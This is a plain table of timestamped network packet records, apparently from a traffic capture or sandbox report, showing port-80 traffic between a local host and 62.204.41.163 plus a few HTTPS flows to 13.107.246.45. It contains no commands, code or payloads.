Nov 2, 2024 17:56:25.920088053 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920124054 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920157909 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920178890 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920188904 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920211077 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920263052 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920281887 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920290947 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920295000 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920310974 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920325994 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920435905 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920448065 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920459032 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.920469046 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920480967 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.920500040 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.960563898 CET	49715	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:25.960589886 CET	443	49715	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:25.967396975 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.967456102 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.967468977 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.967474937 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.967494011 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.967516899 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.967569113 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.967580080 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:25.967605114 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:25.967614889 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.007414103 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:26.007488012 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:26.007563114 CET	49714	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:26.007966995 CET	49714	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:26.007992983 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:26.008009911 CET	49714	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:26.008018017 CET	443	49714	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:26.010277033 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010346889 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010345936 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010366917 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010396004 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010410070 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010462999 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010481119 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010505915 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010507107 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010526896 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010536909 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010667086 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010680914 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010704994 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010719061 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010742903 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010782003 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010834932 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010852098 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.010880947 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010880947 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.010986090 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.011013031 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.011027098 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.011028051 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.011049032 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.011059999 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.011178017 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.011217117 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.011261940 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.011279106 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.011300087 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.011321068 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.016695023 CET	49716	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:26.016748905 CET	443	49716	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:26.016854048 CET	49716	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:26.017960072 CET	49716	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:26.017981052 CET	443	49716	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:26.036223888 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.036250114 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.036263943 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.036289930 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.036290884 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.036319017 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.036339998 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037264109 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037302017 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037307978 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037323952 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037343025 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037358046 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037448883 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037465096 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037480116 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037487030 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037499905 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037516117 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037836075 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037849903 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037864923 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037873983 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037887096 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037902117 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037904024 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037920952 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.037938118 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.037956953 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.038044930 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.038079977 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.038228989 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.038264036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.038285017 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.038331032 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.038369894 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.038383007 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.038404942 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.038430929 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.085643053 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.085661888 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.085678101 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.085758924 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.085798025 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.127536058 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127572060 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127584934 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127644062 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127645969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.127657890 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127687931 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.127700090 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.127865076 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127876997 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127888918 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.127904892 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.127931118 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128195047 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128237963 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128276110 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128288031 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128323078 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128336906 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128349066 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128367901 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128385067 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128387928 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128406048 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128417969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128525972 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128567934 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128716946 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128753901 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128772974 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128789902 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128812075 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128825903 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.128902912 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.128937960 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.153506994 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.153528929 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.153539896 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.153594017 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.153625011 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.153644085 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.153690100 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154571056 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154619932 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154624939 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154633999 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154658079 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154676914 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154700994 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154742002 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154784918 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154798031 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154824972 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154843092 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154920101 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154932022 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.154956102 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.154994965 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.155247927 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.155292034 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.155327082 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.155339003 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.155364037 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.155376911 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.155457973 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.155494928 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.155531883 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.155544043 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.155569077 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.155584097 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.202939987 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.202954054 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.202965021 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.203097105 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.246984959 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.246995926 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247009039 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247030020 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247040987 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247131109 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.247140884 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247153044 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247165918 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247167110 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.247205019 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.247241020 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.247642040 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247656107 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247667074 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.247684956 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.247843981 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.248097897 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248116970 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248131037 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248145103 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.248178959 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.248193979 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248205900 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248219013 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248230934 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.248230934 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248245001 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248260975 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.248327017 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.248462915 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.248500109 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.271275043 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.271294117 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.271306038 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.271362066 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.271409988 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.271419048 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.271424055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.271450043 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.271470070 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.271879911 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.271919012 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272284031 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272303104 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272316933 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272334099 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272341967 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272341967 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272342920 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272372007 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272392988 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272397995 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272407055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272445917 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272464037 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272598028 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272617102 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272631884 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272639036 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272650003 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272669077 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.272983074 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.272999048 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.273020983 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.273020983 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.273030043 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.273056984 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.320463896 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.320487976 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.320540905 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.320611000 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.320641994 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.320683956 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.320728064 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364209890 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364229918 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364243984 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364259958 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364342928 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364351988 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364398956 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364407063 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364419937 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364444971 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364474058 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364686012 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364712000 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364737988 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364743948 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364757061 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364773035 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364779949 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364788055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.364813089 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.364830971 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365174055 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365187883 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365201950 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365221024 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365236044 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365458012 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365483046 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365495920 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365504026 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365519047 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365530968 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365535021 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.365546942 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365566969 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.365580082 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.388900042 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.388993025 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.389055967 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389075994 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389091969 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389110088 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.389146090 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.389173985 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389216900 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.389405012 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389451981 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.389681101 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389727116 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.389945030 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389971972 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.389987946 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390002966 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390013933 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390013933 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390022039 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390023947 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390045881 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390063047 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390069008 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390084028 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390099049 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390115023 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390122890 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390122890 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390141010 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390158892 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:26.390389919 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390407085 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390429974 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:26.390443087 CET	49700	80	192.168.2.7	62.204.41.163
